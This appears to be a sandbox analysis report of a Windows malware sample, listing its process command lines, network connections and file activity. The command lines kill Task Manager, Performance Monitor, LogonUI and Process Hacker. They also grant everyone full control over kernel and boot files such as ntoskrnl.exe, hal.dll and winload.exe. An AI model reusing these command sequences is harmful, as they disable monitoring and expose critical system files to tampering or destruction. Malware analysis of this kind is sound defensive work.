wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\hal.dll" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\winload.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Process Hacker 2" /q /c /t /grant "everyone":F
C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\drivers" /q /c /t /grant "everyone":F
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='perfmon.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='ProcessHacker.exe' delete /nointeractive
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
C:\Windows\system32\cacls.exe
cacls "C:\Windows\System32\drivers" /grant "everyone":F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | archive.org | udp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 207.241.224.2:443 | archive.org | tcp |
| US | 207.241.239.241:443 | polyfill.archive.org | tcp |
| US | 207.241.225.195:443 | analytics.archive.org | tcp |
| US | 207.241.225.195:443 | analytics.archive.org | tcp |
| US | 207.241.225.195:443 | analytics.archive.org | tcp |
| DE | 142.250.185.74:443 | content-autofill.googleapis.com | tcp |
| DE | 142.250.185.74:443 | content-autofill.googleapis.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 207.241.232.192:443 | ia803402.us.archive.org | tcp |
| N/A | 127.0.0.1:49850 | | tcp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 44.232.194.163:443 | shavar.services.mozilla.com | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.120.5.221:443 | prod.pocket.prod.cloudops.mozgcp.net | tcp |
| N/A | 127.0.0.1:49858 | | tcp |
| DE | 142.250.185.68:443 | www.google.com | udp |
| DE | 142.250.185.68:443 | www.google.com | tcp |
| DE | 142.250.186.110:443 | play.google.com | udp |
| DE | 142.250.186.110:443 | play.google.com | tcp |
| DE | 142.250.185.142:443 | consent.google.com | tcp |
| DE | 142.250.185.74:443 | content-autofill.googleapis.com | udp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | tcp |
| DE | 142.250.184.238:443 | encrypted-vtbn0.gstatic.com | tcp |
| DE | 216.58.206.46:443 | encrypted-tbn0.gstatic.com | udp |
| DE | 142.250.184.238:443 | encrypted-vtbn0.gstatic.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:50269 | | tcp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| N/A | 127.0.0.1:50284 | | tcp |
| NL | 52.111.243.29:443 | | tcp |
Files
\??\pipe\crashpad_3620_KKAKVZIJJDYYDSCC
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\solaris.7z_archive.torrent:Zone.Identifier
C:\Users\Admin\Downloads\solaris.7z_archive.torrent
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\activity-stream.discovery_stream.json.tmp
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\activity-stream.discovery_stream.json.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57ceaa.TMP
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionstore.jsonlz4
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\Solaris 2.0.z01:Zone.Identifier
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\Solaris 2.0.z01
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\prefs.js
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\startupCache\scriptCache-child.bin
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\startupCache\urlCache.bin
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\addonStartup.json.lz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\xulstore.json
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\startupCache\scriptCache.bin
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\SiteSecurityServiceState.txt
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\protections.sqlite
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cache2\entries\254256B27E0C48CF9B80B695F0B3B8CA84610495
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\datareporting\glean\db\data.safe.bin
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\places.sqlite
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cache2\entries\383A97A57B113BD106DE6984E6DBA5F537327263
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\AlternateServices.txt
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\cert9.db
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\prefs-1.js
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionstore.jsonlz4
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fy0o2joj.default-release\sessionCheckpoints.json.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\0x07.exe
C:\Users\Admin\Downloads\0x07.exe:Zone.Identifier
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Windows\Temp\winconfig.exe
C:\Users\Admin\AppData\Local\Temp\D82B.tmp\D82C.tmp\D82D.bat
C:\Users\Admin\AppData\Roaming\DetectKey.exe